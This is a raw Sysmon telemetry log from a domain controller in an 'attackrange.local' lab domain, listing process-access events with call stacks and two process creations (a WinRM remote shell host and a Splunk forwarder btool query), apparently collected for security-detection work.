10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000621Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000620Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000619Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000618Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000617Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD8-5F80-1303-000000007E01}2592C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000616Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD8-5F80-1303-000000007E01}2592C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000615Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.625{733EE690-3DD8-5F80-1303-000000007E01}2592C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3DD8-5F80-7BEE-110000000000}0x11ee7b0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3C68-5F80-0C00-000000007E01}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000614Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.609{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000613Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.609{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000612Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.609{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000696Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:21.249{733EE690-3C68-5F80-0C00-000000007E01}608732C:\Windows\system32\svchost.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000695Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:21.249{733EE690-3C68-5F80-0C00-000000007E01}608732C:\Windows\system32\svchost.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000694Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:21.249{733EE690-3C68-5F80-0C00-000000007E01}608716C:\Windows\system32\svchost.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001739Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0A-5F80-4200-000000007F01}3996C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001738Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001737Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001736Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001735Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001734Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001733Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001732Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001731Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001730Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E0A-5F80-4200-000000007F01}3996C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001729Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001728Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.824{733EE690-3E0A-5F80-4100-000000007F01}39763980C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{733EE690-3E0A-5F80-4200-000000007F01}3996C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001727Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.832{733EE690-3E0A-5F80-4200-000000007F01}3996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings 